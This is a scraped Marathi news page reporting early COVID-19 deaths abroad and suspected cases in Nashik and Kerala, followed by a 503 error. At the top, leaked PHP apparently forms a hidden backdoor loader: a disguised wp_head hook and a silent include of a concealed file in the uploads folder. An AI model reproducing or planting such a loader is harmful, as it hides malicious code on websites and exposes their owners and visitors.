add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); अमेरिका, ऑस्ट्रेलियात पहिल्या बळीची नोंद – SOCH INDIA
Menu

देश
अमेरिका, ऑस्ट्रेलियात पहिल्या बळीची नोंद

nobanner

जगातील ८६ हजाराहून अधिक नागरिकांना करोना विषाणूचा संसर्ग झाल्याचे निष्पन्न झाले असून रविवारी अमेरिका, ऑस्ट्रेलिया आणि थायलंडमध्ये प्रत्येकी एका रुग्णाचा मृत्यू झाला.

जागतिक आरोग्य संघटनेने जाहीर केलेल्या आकडेवारीनुसार चीनमध्ये आतापर्यंत २,८७० करोना रुग्णांचा मृत्यू झाला, तर ७९,८२४ जणांना संसर्ग झाला आहे. चीनमध्ये शनिवारी ३५ रुग्णांचा मृत्यू झाला तर नवे ५७३ रुग्ण आढळले. आतापर्यंत इराणमध्ये ५४, इटलीत २९, दक्षिण कोरियात १७, जपानमधील क्रूझवर १२, तर हाँगकाँग आणि फ्रान्समध्ये प्रत्येकी दोन करोनाग्रस्तांचा मृत्यू झाल्याचे जागतिक आरोग्य संघटनेने जाहीर केले.

नाशिकच्या संशयितास संसर्ग नाही

इटलीहून आलेल्या व्यक्तीमध्ये करोना संसर्गाची कोणतीही लक्षणे आढळली नसल्याचा निर्वाळा पुणे येथील वैद्यकीय प्रयोगशाळेने दिल्याची माहिती नाशिक जिल्हा प्रशासनाच्या वतीने देण्यात आली आहे. त्यामुळे नाशिकमध्ये करोनाचा रुग्ण असल्याच्या चर्चेला पूर्णविराम मिळाला आहे.

केरळमध्ये संशयित रुग्णाचा मृत्यू : मलेशियाहून आलेल्या एका संशयित करोना रुग्णाचा एर्नाकुलम येथील रुग्णालयात मृत्यू झाला. जैनेश नावाचा हा ३६ वर्षीय संशयित रुग्ण दाखल होताच त्याला सरकारी रुग्णालयातील स्वतंत्र कक्षात ठेवण्यात आले. त्याची करोना संसर्गाची चाचणी केली असता संसर्ग नसल्याचे स्पष्ट झाले, परंतु त्यानंतर त्याचा मृत्यू झाला.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.